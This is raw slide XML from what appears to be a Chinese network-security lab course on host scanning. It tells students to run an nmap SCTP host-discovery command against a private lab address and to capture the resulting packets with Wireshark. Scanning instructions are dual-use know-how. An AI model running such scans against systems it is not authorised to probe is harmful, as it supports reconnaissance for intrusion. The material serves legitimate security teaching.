              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="文本框 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721985" y="1763395"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sn -PY --send-ip 192.168.172.129”命令进行主机发现，“-PY”参数表示使用SCTP协议进行扫描，如图2-2-25所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721985" y="2685415"/>
            <a:ext cx="5191125" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="文本框 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721985" y="3961765"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-25 使用-PY参数进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行SCTP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="文本框 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1075055"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用Wireshark工具抓取nmap工具发送的数据包，如图2-2-26所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1720215"/>
            <a:ext cx="5267325" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="文本框 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5320665"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-26 Wireshark工具抓取数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行SCTP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
